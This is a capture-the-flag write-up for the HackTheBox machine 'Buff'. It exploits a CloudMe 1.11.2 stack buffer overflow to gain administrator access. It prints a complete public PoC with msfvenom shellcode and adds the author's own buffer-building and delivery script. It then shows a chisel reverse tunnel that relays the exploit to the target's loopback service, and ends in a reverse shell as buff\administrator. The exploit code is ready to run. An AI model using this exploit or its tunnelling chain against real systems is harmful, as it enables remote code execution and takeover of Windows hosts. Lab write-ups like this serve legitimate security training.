CVE-2018-6892


The vulnerability ultimately led to another one, CVE-2018-7886, because the fix for CVE-2018-6892 was incomplete. This also appears to affect version 1.11.2.

Exploit


# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket
import sys

target = "127.0.0.1"

padding1   = b"\x90" * 1052                  # filler up to the saved return address
EIP        = b"\xB5\x42\xA8\x68"             # 0x68A842B5 -> PUSH ESP, RET (little-endian)
NOPS       = b"\x90" * 30                    # short sled so execution slides into the payload

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload    = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload   += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload   += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload   += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload   += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload   += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload   += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload   += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload   += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload   += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload   += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload   += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload   += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload   += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload   += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload   += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload   += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

# pad the request out to a fixed 1500 bytes regardless of payload size
overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))                 # CloudMe Sync listens on TCP 8888
    s.sendall(buf)
    s.close()
except Exception as e:
    # the original printed sys.exc_value, which does not exist in Python 3
    print(e)
    sys.exit(1)

It’s a typical stack buffer overflow. The PoC launches calc.exe upon exploitation, so the payload needs to be swapped out.

I replaced the payload with reverse shell shellcode.

Now that the exploit is ready, I would have to expose the CloudMe service running on the target socket 127.0.0.1:8888, since it is bound to the loopback interface and not reachable from Kali directly.
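Swapping the payload is where this kind of PoC usually breaks: the new shellcode can be longer than the calc.exe stub, or it can carry one of the bytes msfvenom was told to avoid, and either mistake fails silently. The following is an added helper of my own, not part of Andy Bowden's PoC or of CloudMe, that rebuilds the same layout the PoC uses (1052 bytes of filler, the PUSH ESP; RET address 0x68A842B5, a 30-byte NOP sled, the shellcode, then padding to a fixed 1500 bytes) around arbitrary shellcode, rejects bad characters \x00\x0A\x0D, and reports where the return address and shellcode land. The function names, the int3 stand-in shellcode and the command-line convention are assumptions of this example; in real use the shellcode file would be msfvenom reverse-shell output generated with the same -b '\x00\x0A\x0D' exclusion.

```python
import socket
import struct
import sys

# Layout constants taken from the PoC above.
OFFSET_TO_EIP = 1052            # bytes of filler before the saved return address
RET_ADDR = 0x68A842B5           # PUSH ESP; RET gadget used by the PoC
NOP_SLED_LEN = 30
TOTAL_LEN = 1500                # the PoC always sends a fixed 1500-byte request
BADCHARS = b"\x00\x0a\x0d"      # bytes excluded with msfvenom -b '\x00\x0A\x0D'

# Constructed stand-in shellcode (int3 breakpoints) so the module runs offline;
# replace with the msfvenom reverse-shell output in real use.
TEST_SHELLCODE = b"\xcc" * 8


def check_badchars(shellcode, badchars=BADCHARS):
    """Return the set of forbidden byte values present in shellcode (empty == clean)."""
    return {b for b in badchars if b in shellcode}


def build_buffer(shellcode, offset=OFFSET_TO_EIP, ret_addr=RET_ADDR,
                 nop_len=NOP_SLED_LEN, total_len=TOTAL_LEN):
    """Assemble filler + return address + NOP sled + shellcode + padding.

    Raises ValueError if the shellcode carries a bad character or does not fit
    inside the fixed-size request; both mistakes would otherwise just crash
    the service without a shell.
    """
    bad = check_badchars(shellcode)
    if bad:
        raise ValueError("shellcode contains bad chars: "
                         + ", ".join("%#04x" % b for b in sorted(bad)))
    eip = struct.pack("<I", ret_addr)     # little-endian, same bytes as b"\xB5\x42\xA8\x68"
    fixed = offset + len(eip) + nop_len + len(shellcode)
    if fixed > total_len:
        raise ValueError("shellcode too large by %d bytes" % (fixed - total_len))
    return (b"\x90" * offset) + eip + (b"\x90" * nop_len) + shellcode \
        + b"C" * (total_len - fixed)


def describe_layout(shellcode, **kw):
    """Return (eip_index, shellcode_index, total_length) for a buffer built from shellcode."""
    offset = kw.get("offset", OFFSET_TO_EIP)
    nop_len = kw.get("nop_len", NOP_SLED_LEN)
    buf = build_buffer(shellcode, **kw)
    return offset, offset + 4 + nop_len, len(buf)


def send_buffer(buf, host, port=8888, timeout=5.0):
    """Deliver the buffer over one TCP connection; returns the number of bytes sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(buf)
    return len(buf)


if __name__ == "__main__":
    # Usage: python3 cloudme_build.py <host> <shellcode.bin>
    # With the chisel reverse tunnel in place, <host> is 127.0.0.1 on the Kali side.
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    shellcode = open(sys.argv[2], "rb").read() if len(sys.argv) > 2 else TEST_SHELLCODE
    eip_at, sc_at, n = describe_layout(shellcode)
    print("EIP at offset %d, shellcode at offset %d, %d bytes total" % (eip_at, sc_at, n))
    send_buffer(build_buffer(shellcode), host)
```

The fixed 1500-byte total matters more than it looks: the PoC's overrun padding is computed from the payload length, so a longer payload shrinks the padding rather than growing the request, and a payload that pushes past 1500 bytes changes what overwrites the stack frame.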

Tunneling with Chisel


c:\tmp> copy \\10.10.14.11\smb\chiselx64.exe .
The system cannot find the file specified.
 
c:\tmp> copy \\10.10.14.11\smb\chiselx64.exe .
        1 file(s) copied.
 
c:\tmp> chiselx64.exe client 10.10.14.11:55555 R:8888:127.0.0.1:8888
2023/01/27 12:49:59 client: Connecting to ws://10.10.14.11:55555
2023/01/27 12:50:00 client: Connected (Latency 43.5831ms)

From the target system, the reverse tunnel maps port 8888 on the Kali host to port 8888 on the target's loopback interface.

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ chisel server -p 55555 --reverse
2023/01/27 13:48:50 server: Reverse tunnelling enabled
2023/01/27 13:48:50 server: Fingerprint GLs10dbNG0clCWMvjCRWukNi6XUvu1FXKaNsDgUj/L4=
2023/01/27 13:48:50 server: Listening on http://0.0.0.0:55555
2023/01/27 13:50:00 server: session#1: tun: proxy#R:8888=>8888: Listening

The tunnel is established. The CloudMe service should now be reachable through port 8888 on the Kali host.

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ python3 cloudme_bof.py

Launching the exploit. The script's hard-coded 127.0.0.1:8888 now points at the chisel listener on Kali, which relays the buffer to CloudMe on the target.

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.198] 49687
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
 whoami
buff\administrator
 
C:\Windows\system32> hostname
 hostname
BUFF
 
C:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::225
   IPv6 Address. . . . . . . . . . . : dead:beef::cd03:7ac5:8f80:ff81
   Temporary IPv6 Address. . . . . . : dead:beef::84f1:21f6:5782:110
   Link-local IPv6 Address . . . . . : fe80::cd03:7ac5:8f80:ff81%10
   IPv4 Address. . . . . . . . . . . : 10.10.10.198
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%10
                                       10.10.10.2

System Level Compromise